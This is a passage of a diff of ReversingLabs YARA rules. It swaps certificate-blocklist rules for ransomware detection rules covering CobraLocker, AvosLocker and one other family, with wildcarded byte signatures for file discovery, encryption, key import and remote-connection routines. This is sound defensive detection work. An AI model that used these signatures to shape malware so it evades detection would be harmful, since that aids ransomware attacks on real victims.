+            40 ?? 89 01 EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB
+            ?? 50 8B CE E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ??
+            ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ??
+            75 ?? 33 FF 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F
+            5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B
+            48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8
+        }
+		$encrypt_files_p1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 55 8B 6C 24 ?? 56 8B
+            74 24 ?? 57 8B 7C 24 ?? 85 F6 0F 8E ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 57 E8 ?? ?? ?? ??
+            83 C4 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 57 E8
+            ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 85 C0 75 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ??
+            ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 8B 4C 24 ?? 8B C1
+            83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ??
+            83 C4 ?? 85 C0 75 ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? A1 ?? ?? ?? ?? 85 C0 75
+        }
+		$encrypt_files_p2 = {
+            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 33 C9
+            85 F6 7E ?? 8D 56 ?? 53 8B 5C 24 ?? 03 D7 66 0F 1F 44 00 ?? 8A 04 19 8D 52 ?? 41 88
+            42 ?? 3B CE 7C ?? 5B 8D 44 24 ?? 89 74 24 ?? 50 8B 44 24 ?? 57 6A ?? 6A ?? 6A ?? FF
+            70 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ??
+            ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 44
+            24 ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? FF 74 24 ?? 57 E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC
+            E8 ?? ?? ?? ?? 83 C4 ?? C3 8B 74 24 ?? 56 57 55 E8 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 8B C6 5F 5E 5D
+            33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3
+        }
+		$remote_connection_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? E8 ??
+            ?? ?? ?? FF 35 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ??
+            E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8B D8 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83
+            C4 ?? 49 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? 83 3D ?? ??
+            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 89 41 ?? 8B F2 A1 ?? ?? ?? ?? 89
+            41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 8A 02 42 84 C0 75 ?? 8D BD ??
+            ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4
+            8D 8D ?? ?? ?? ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            8B F2 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 66 90 8A 02 42 84
+            C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B
+            CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 0F 1F 00 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
+            ?? ?? ?? 8B F3 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 8A 03 43
+            84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B DE 4F 8A 47 ?? 47 84 C0 75 ?? 8B CB C1 E9 ?? F3 A5
+            8B CB 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? 8B F2 89 01 A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 0F
+        }
+		$remote_connection_p2 = {
+            1F 44 00 ?? 8A 02 42 84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ??
+            8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 0F 1F 00 8A 41 ?? 8D
+            49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
+            ?? A0 ?? ?? ?? ?? 6A ?? 88 41 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C7 45
+            ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 51 ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ??
+            ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B D8 85
+            DB 74 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6
+            74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 56
+            FF 15 ?? ?? ?? ?? 56 FF D7 53 FF D7 FF B5 ?? ?? ?? ?? FF D7 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B
+            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sony Pictures Entertainment Inc." and pe.signatures [ i ] . serial == "01:e2:b4:f7:59:81:1c:64:37:9f:ca:0b:e7:6d:2d:ce" and 1417651200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_03E5A010B05C9287F823C2585F547B80 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Cobralocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects CobraLocker ransomware."
 		author = "ReversingLabs"
-		id = "14ad79c7-f669-59a6-94d1-978a13fbb337"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "dada6370-3ae3-5931-ba9f-da56ebbcd8c8"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1126-L1142"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1d57b640ee313ad4d53dc64ce4df3e4ed57976e7750cfd80d62bf9982d964d26"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Bytecode.MSIL.Ransomware.CobraLocker.yara#L1-L59"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "95f4c645c7c237d23b5028f824f78a5f9f8f0a4737b391d877582afe08264d7e"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "CobraLocker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MOCOMSYS INC" and pe.signatures [ i ] . serial == "03:e5:a0:10:b0:5c:92:87:f8:23:c2:58:5f:54:7b:80" and 1385423999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0Fe7Df6C4B9A33B83D04E23E98A77Cce : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "47a10658-c5c4-58b6-b154-7babcfbc50a2"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1144-L1160"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "da5ed07def8d0c04ea58aacd90f9fa5588f868f6d0057b9148587f2f0b381f25"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files = {
+            14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73 ??
+            ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
+            03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
+            09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16 02
+            8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DD ?? ?? ?? ?? 11 ?? 38 ?? ?? ?? ??
+            38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 08 6F ?? ?? ?? ?? 0A 00 DD ??
+            ?? ?? ?? 09 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 DC 00 DD
+            ?? ?? ?? ?? 08 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 00 DC 06
+            13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 11 ?? 2A
+        }
+		$find_files = {
+            16 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            0C 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 06 72 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ??
+            ?? ?? ?? 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17
+            28 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ??
+            00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69
+            FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ??
+            ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ??
+            ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11
+            ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ??
+            6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ??
+            ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ??
+            16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ??
+            ?? ?? 3A ?? ?? ?? ?? 2A
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PIXELPLUS CO., LTD." and pe.signatures [ i ] . serial == "0f:e7:df:6c:4b:9a:33:b8:3d:04:e2:3e:98:a7:7c:ce" and 1396310399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_065569A3E261409128A40Affa90D6D10 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Avoslocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects AvosLocker ransomware."
 		author = "ReversingLabs"
-		id = "924c210b-f72a-51eb-af2a-9897faf8f677"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "a803283d-6424-5a64-89e6-c73a3322ba1e"
+		date = "2021-10-22"
+		modified = "2021-10-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1162-L1178"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f8d68758704e41325e95ec69334aaf7fabe08a6d5557e0a81bac2f02d3ab5977"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.AvosLocker.yara#L1-L108"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4d81b801a95a54a35989c4a985d92578971568d1412f625bca911d0fa1eee1fe"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "AvosLocker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Police Mutual Aid Association" and pe.signatures [ i ] . serial == "06:55:69:a3:e2:61:40:91:28:a4:0a:ff:a9:0d:6d:10" and 1381795199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0979616733E062C544Df0Abd315E3B92 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "73222a8d-df63-5784-b5a2-0d936db8ddcb"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1180-L1196"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "034b233d6b6dd82ad9fa1ec99db1effa3daaa5bb478d448133c479ac728117ad"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF
+            B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89
+            9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9
+            ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ??
+            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ??
+            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15
+        }
+		$enum_resources = {
+            50 51 6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? 57
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 33 DB 39 5D ?? 76 ?? 8D 77 ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 83 7E
+            ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? 39 46 ?? B9 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 8B D1 0F 45 56 ?? 8B C1 83
+            7E ?? ?? 0F 11 85 ?? ?? ?? ?? 0F 45 46 ?? 83 3E ?? 0F 28 05 ?? ?? ?? ?? 89 45 ?? 8B
+            C1 0F 45 06 83 7E ?? ?? 0F 11 45 ?? 89 45 ?? 8B C1 0F 28 05 ?? ?? ?? ?? 0F 45 46 ??
+            33 C9 0F 11 45 ?? 89 45 ?? 0F 28 05 ?? ?? ?? ?? 0F 11 45 ?? 8A 85 ?? ?? ?? ?? 30 84
+            0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? 52 FF 75 ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? FF 75 ??
+            FF 75 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 3E ?? 0F 84 ?? ?? ?? ?? FF 36 E8 ?? ?? ?? ??
+            59 83 F8 ?? 0F 86 ?? ?? ?? ?? 8B 06 80 78 ?? ?? 75 ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 33 C0 66 C7 45 ?? ?? ?? C6 45 ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ??
+            8A 4D ?? EB ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 FF 36 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 65 ?? ?? 50 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ??
+            C6 45 ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 83 4D ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? EB ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ??
+            C6 45 ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8D 45 ?? C6 45 ?? ?? 50 E8
+            ?? ?? ?? ?? 59 F7 46 ?? ?? ?? ?? ?? 74 ?? 8D 4E ?? E8 ?? ?? ?? ?? 43 83 C6 ?? 3B 5D
+            ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 75 ?? FF 15
+        }
+		$import_key = {
+            50 53 53 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? FF D6 50 53 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B1 ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B C3 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 30 8C 05 ?? ??
+            ?? ?? 40 83 F8 ?? 73 ?? 8A 8D ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 59 0F 11 85 ?? ?? ?? ??
+            59 0F 28 05 ?? ?? ?? ?? 8B CB 0F 11 85 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 88 9D
+            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? 88 9D ?? ?? ??
+            ?? FF D6 50 8D 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 36 8D 45 ?? 89 9D ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? FF 76 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 8D ??
+            ?? ?? ?? 83 C4 ?? 8B D7 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            84 C0 75 ?? 0F 28 05 ?? ?? ?? ?? 8B CB 0F 11 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
